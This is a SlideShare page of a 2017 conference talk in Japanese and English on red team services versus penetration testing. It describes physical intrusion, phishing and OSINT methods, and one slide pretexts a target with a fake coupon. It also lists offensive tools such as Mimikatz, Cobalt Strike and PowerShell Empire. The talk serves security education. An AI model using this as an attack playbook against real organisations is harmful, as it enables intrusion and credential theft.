SlideShare uma empresa Scribd logo

[AVTOKYO 2017] What is red team?

Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE

AV TOKYO 2017(http://ja.avtokyo.org/)の講演資料を公開します。

Tecnologia
1 de 37
What is Red Team Service? ~Latest Penetration Test Trends in U.S.~ TOMOHISA ISHIKAWA scientia.admin@gmail.com www.scientia-security.org
$$ WHO AM I ?  Tomohisa Ishikawa • Security Consultant (9 years experience) • Specialized Area • Penetration Test, IR, Security Consultation, Vulnerability Management, Awareness, Training, Global Security Management… • Various Speaker Experience • SANSFIRE 2011 & 2012, DEF CON 24 SE Village, LASCON 2016, BSides Philly 2017 • Certification Junkie • CISSP, CSSLP, CISA, CISM, CFE, GPEN, GWAPT, GXPN, GWEB, GSNA, GREM, GCIH
Objective  Sharing One Year Experience in security team of U.S. insurance company  Understanding difference of Methodology • Traditional “Penetration Test” vs. “Red Team”
皆様の会社(組織)、ペネトレーションテスト やっていますか? Do you have penetration test in your organization??
日本で言うペネトレーションテストって… Penetration Test in Japan is …  某L社とか某N社のページを見てみると.. Let’s see HP of N company, L company, M company… • Webセキュリティ診断サービス (Web Application Testing) • プラットフォーム診断サービス (Platform Testing) • 標的型攻撃診断サービス(メール訓練サービス・出口対策検証) • 無線LAN診断サービス • DDoS体制検証サービス  安全第一!! Safety of system is First Priority.  ※ ちなみにセキュリティ診断とペネトレーションテストをほぼ同じ意味で使いますが、宗教上の 理由でこの二つを一緒に語ることが許せない人とは適当に読み替えてください。
米国に行くと… 意外とペネトレーションテスターって 言わない人が多い? Only few people said “I am a penetration tester”
「ペネトレーションテスト」ってダサい? “Penetration Test” is tacky???
What is “Red Team”?  もともと、諜報機関で生まれた概念 Originally, it is from intelligence community  敵の観点から作戦を検証したり、取得した情報の信憑性を批判的に 検証するチームのこと Verify strategies or information from adversary view point • Devil‘s Advocate(悪魔の弁護人) • CIA Red Cell
What is the difference btw “Red Team” and “Pen Test”? ⇒ Coverage is different!! Digital Physical Social • Web Application Testing • Platform Testing • APT Simulation • APT Mail Awareness training • Vishing(Voice Phishing) • OSINT • Tail Gating • Impersonation • ID Card Cloning • Physical Access to box • Elevator Hacking • Physical Control Bypass
 According to Gartner… • Long Term Challenge (NOT point-in-time assessment) • より長期的にテストを実施。実施時間も24時間いつでも実施する. • Defense Coordination • Blue Teamの機能も含めて評価を行い、改善につなげる。 • Adversary Simulation • 攻撃者そのものの観点から実施する。(3つの観点の融合) • Controlled but Real Intrusion What is the difference btw “Red Team” and “Pen Test”? ⇒ Different Feature
Case 1: Physical Penetration Test
 Objective • どこまで内部侵入して情報が取れるのか? Is it possible to bypass physical access control?  Methodology • Breaking Lock (Picking, impassioning, Bypassing) • Elevator Hacking • RFID Cloning • Social Engineering Physical Penetration Test
Case 2: APT Adversary Simulation Service
 SLA of APT Adversary Simulation Service is following. • Awareness Phishing • Penetration Test Phishing • Red Team Phishing 標的型攻撃サービス APT Adversary Simulation Service
 Attempting attacks as same as “Japan Pension Service” • Following Cyber Kill Chain • OSINT & SOCMINT • Selecting 2~3 targets, and sending attached email • Exploitation • Using “Fresh” vulnerability & Exploit • Post Exploitation with PowerShell • Password Cracking with GPU • Lateral Movement & Reaching out “Treasures” Red Team Phishing
OSINT Example  Check LinkedIn and find out target  Analyzing Twitter with SOCMINT Tools • Target has a tendency to buy shoes in apparel shop • Sending Coupon by pretending as appeal shop
TOOLS  OSINT • Maltago https://www.paterva.com/web7/ • FOCA https://www.elevenpaths.com/labstools/foca/index.html • SpiderFoot http://www.spiderfoot.net/ • Discovery Script https://github.com/leebaird/discover • Recon-ng https://bitbucket.org/LaNMaSteR53/recon-ng • Cymon https://cymon.io/ • WeLink https://welink.com/dashboard/ • GEOFEEDIA https://geofeedia.com/ • ECHOSEC https://www.echosec.net/
TOOLS  OTHER TOOLS (Part of them is experimental) • GoPhish https://getgophish.com/ • Social Engineering Toolkit in Kali Linux • Cobalt Strike https://www.cobaltstrike.com/ • Mimikatz https://github.com/gentilkiwi/mimikatz • Responder https://github.com/SpiderLabs/Responder • IPMI http://fish2.com/ipmi/remote-pw-cracking.html • MITM Framework https://github.com/byt3bl33d3r/MITMf • Spray WMI https://github.com/trustedsec/spraywmi
TOOLS  PowerShell Tools • PowerShell Empire https://github.com/EmpireProject/Empire • EmPyre (Python) https://github.com/EmpireProject/EmPyre • PowerSploit https://github.com/PowerShellMafia/PowerSploit • Including PowerView・Invoke-Mimikatz・PowerUp • Veil Framework https://www.veil-framework.com/ • Nishang https://github.com/samratashok/nishang • Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation • PS Attack https://github.com/jaredhaight/psattack • NaishoDeNusumu https://github.com/3nc0d3r/NaishoDeNusumu • BloodHound https://github.com/BloodHoundAD/BloodHound
Resource  Great Presentation • AD Security https://adsecurity.org/ • All presentation is awesome • Adversarial Post-Exploitation: Lessons From The Pros • https://www.youtube.com/watch?v=x3crG-hM9sc • A Year in the Empire • https://www.youtube.com/watch?v=ngvHshHCt_8 • PowerShell Secrets and Tactics • https://www.youtube.com/watch?v=EQv4bJnCw8M • Introducing PowerShell into your Arsenal with PS>Attack • https://www.youtube.com/watch?v=mPckt6HQPsw • Invoke-Obfuscation: PowerShell obFUsk8tion Techniques • https://www.youtube.com/watch?v=P1lkflnWb0I
From Blue Team Side  以下が本当に重要!! • Full Spectrum Visibility (完全な可視化) • Targeted Containment (標的型封じ込め)  EDR (Endpoint Detection & Response) • Ex) Tanium, Fidelis, Carbon Black, FireEye, Crowd Strike, Red Cloak, Cyber Reason…
Wrap-Up  “Red team” is U.S. trends  Focus on comprehensive test
Thank You!!  If you have any questions, please feel free to contact me Contact Info • Email scientia.admin@gmail.com • JP Blog www.scientia-security.org
Bonus Session
Digital Penetration Test Certification  Certification for Penetration Tester • CEH (by EC-Council) • GIAC (by SANS) • OSCP (by Offensive Security)

Recomendados

Red teaming probably isn't for you
Red teaming probably isn't for youRed teaming probably isn't for you
Red teaming probably isn't for you
Toby Kohlenberg
 
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチInternet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
Splunk
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down Intruders
Infosec
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020
Jorge Orchilles
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
The Rise of the Purple Team
The Rise of the Purple TeamThe Rise of the Purple Team
The Rise of the Purple Team
Priyanka Aash
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
Haydn Johnson
 

Recomendados

Red teaming probably isn't for you
Red teaming probably isn't for youRed teaming probably isn't for you
Red teaming probably isn't for you
Toby Kohlenberg
 
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチInternet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
Internet Week 2019:D2-3 攻撃者をあぶり出せ!! プロアクティブなセキュリティアプローチ
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
Splunk
 
Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down Intruders
Infosec
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020
Jorge Orchilles
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
The Rise of the Purple Team
The Rise of the Purple TeamThe Rise of the Purple Team
The Rise of the Purple Team
Priyanka Aash
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
Haydn Johnson
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
OWASP Delhi
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
ZaiffiEhsan
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
Vishal Kumar
 
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
パケットキャプチャの勘どころ Ssmjp 201501
パケットキャプチャの勘どころ Ssmjp 201501パケットキャプチャの勘どころ Ssmjp 201501
パケットキャプチャの勘どころ Ssmjp 201501
稔 小林
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for Beginners
SKMohamedKasim
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
Teymur Kheirkhabarov
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
Morane Decriem
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Jorge Orchilles
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
Dhruv Majumdar
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
👀 Joe Gray
 
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE - ATT&CKcon
 
俺が考えた最強のID連携デザインパターン
俺が考えた最強のID連携デザインパターン俺が考えた最強のID連携デザインパターン
俺が考えた最強のID連携デザインパターン
Masaru Kurahayashi
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
Katie Nickels
 
Open Souce Intelligence (OSINT)
Open Souce Intelligence (OSINT)Open Souce Intelligence (OSINT)
Open Souce Intelligence (OSINT)
shuna roo
 
Building an InfoSec RedTeam
Building an InfoSec RedTeamBuilding an InfoSec RedTeam
Building an InfoSec RedTeam
Dan Vasile
 
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
MITRE - ATT&CKcon
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018
Christopher Korban
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
Jorge Orchilles
 
米国のペネトレーションテスト事情(ssmjp)
米国のペネトレーションテスト事情(ssmjp)米国のペネトレーションテスト事情(ssmjp)
米国のペネトレーションテスト事情(ssmjp)
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 

Mais conteúdo relacionado

Mais procurados

Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Jorge Orchilles
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
👀 Joe Gray
 
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
MITRE - ATT&CKcon
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
Jorge Orchilles
 

Mais procurados (20)

Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
Internet Week 2018:D2-3 丸ごと分かるペネトレーションテストの今
 
パケットキャプチャの勘どころ Ssmjp 201501
パケットキャプチャの勘どころ Ssmjp 201501パケットキャプチャの勘どころ Ssmjp 201501
パケットキャプチャの勘どころ Ssmjp 201501
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for Beginners
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
 
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
MITRE ATT&CKcon 2.0: Ready to ATT&CK? Bring Your Own Data (BYOD) and Validate...
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
 
俺が考えた最強のID連携デザインパターン
俺が考えた最強のID連携デザインパターン俺が考えた最強のID連携デザインパターン
俺が考えた最強のID連携デザインパターン
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
 
Open Souce Intelligence (OSINT)
Open Souce Intelligence (OSINT)Open Souce Intelligence (OSINT)
Open Souce Intelligence (OSINT)
 
Building an InfoSec RedTeam
Building an InfoSec RedTeamBuilding an InfoSec RedTeam
Building an InfoSec RedTeam
 
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
Measure What Matters: How to Use MITRE ATTACK to do the Right Things in the R...
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
 

Destaque

ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
 
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催についてSECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
takesako
 
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
Sen Ueno
 
Metasploitでペネトレーションテスト
MetasploitでペネトレーションテストMetasploitでペネトレーションテスト
Metasploitでペネトレーションテスト
super_a1ice
 

Destaque (16)

米国のペネトレーションテスト事情(ssmjp)
米国のペネトレーションテスト事情(ssmjp)米国のペネトレーションテスト事情(ssmjp)
米国のペネトレーションテスト事情(ssmjp)
 
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
ニューヨーク州金融サービス局 金融サービス企業に対するサイバーセキュリティ規制
 
[BurpSuiteJapan]Burp Suite回答編
[BurpSuiteJapan]Burp Suite回答編[BurpSuiteJapan]Burp Suite回答編
[BurpSuiteJapan]Burp Suite回答編
 
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催についてSECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
 
初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明
 
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスクosc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
 
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
 
Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向
 
[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法
 
ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話
 
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ
 
CpawCTF 勉強会 Network
CpawCTF 勉強会 NetworkCpawCTF 勉強会 Network
CpawCTF 勉強会 Network
 
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
 
Metasploitでペネトレーションテスト
MetasploitでペネトレーションテストMetasploitでペネトレーションテスト
Metasploitでペネトレーションテスト
 
新卒2年目が鍛えられたコードレビュー道場
新卒2年目が鍛えられたコードレビュー道場新卒2年目が鍛えられたコードレビュー道場
新卒2年目が鍛えられたコードレビュー道場
 
SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向
 

Semelhante a [AVTOKYO 2017] What is red team?

FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUP
Will Pearce
 
Zen and the art of Security Testing
Zen and the art of Security TestingZen and the art of Security Testing
Zen and the art of Security Testing
TEST Huddle
 

Semelhante a [AVTOKYO 2017] What is red team? (20)

Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
 
2018 FRSecure CISSP Mentor Program Session 9
2018 FRSecure CISSP Mentor Program Session 92018 FRSecure CISSP Mentor Program Session 9
2018 FRSecure CISSP Mentor Program Session 9
 
2019 FRSecure CISSP Mentor Program: Class Nine
2019 FRSecure CISSP Mentor Program: Class Nine2019 FRSecure CISSP Mentor Program: Class Nine
2019 FRSecure CISSP Mentor Program: Class Nine
 
The_Pentester_Blueprint.pdf
The_Pentester_Blueprint.pdfThe_Pentester_Blueprint.pdf
The_Pentester_Blueprint.pdf
 
Sexy defense
Sexy defenseSexy defense
Sexy defense
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 
Purple Teaming - The Collaborative Future of Penetration Testing
Purple Teaming - The Collaborative Future of Penetration TestingPurple Teaming - The Collaborative Future of Penetration Testing
Purple Teaming - The Collaborative Future of Penetration Testing
 
The difference between Penetration Testing and Red Team
The difference between Penetration Testing and Red TeamThe difference between Penetration Testing and Red Team
The difference between Penetration Testing and Red Team
 
Penetration testing must die
Penetration testing must diePenetration testing must die
Penetration testing must die
 
OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...
OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...
OSSF 2018 - Jamie Jones of GitHub - Pull what where? Contributing to Open Sou...
 
Software Security Initiative Capabilities: Where Do I Begin?
Software Security Initiative Capabilities: Where Do I Begin? Software Security Initiative Capabilities: Where Do I Begin?
Software Security Initiative Capabilities: Where Do I Begin?
 
Incident response before:after breach
Incident response before:after breachIncident response before:after breach
Incident response before:after breach
 
FUEL_USERS_GROUP
FUEL_USERS_GROUPFUEL_USERS_GROUP
FUEL_USERS_GROUP
 
Secure 360 adversary simulation
Secure 360 adversary simulationSecure 360 adversary simulation
Secure 360 adversary simulation
 
2019 FRSecure CISSP Mentor Program: Class Ten
2019 FRSecure CISSP Mentor Program: Class Ten2019 FRSecure CISSP Mentor Program: Class Ten
2019 FRSecure CISSP Mentor Program: Class Ten
 
Conf 2019 - Workshop: Liam Glanfield - know your threat actor
Conf 2019 - Workshop: Liam Glanfield - know your threat actorConf 2019 - Workshop: Liam Glanfield - know your threat actor
Conf 2019 - Workshop: Liam Glanfield - know your threat actor
 
Zen and the art of Security Testing
Zen and the art of Security TestingZen and the art of Security Testing
Zen and the art of Security Testing
 
Defending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricalityDefending Enterprise IT - beating assymetricality
Defending Enterprise IT - beating assymetricality
 
"Challenges Faced by Testers Working on Agile Teams" by Aldo Rall
"Challenges Faced by Testers Working on Agile Teams" by Aldo Rall"Challenges Faced by Testers Working on Agile Teams" by Aldo Rall
"Challenges Faced by Testers Working on Agile Teams" by Aldo Rall
 

Último

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 

Último (20)

ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
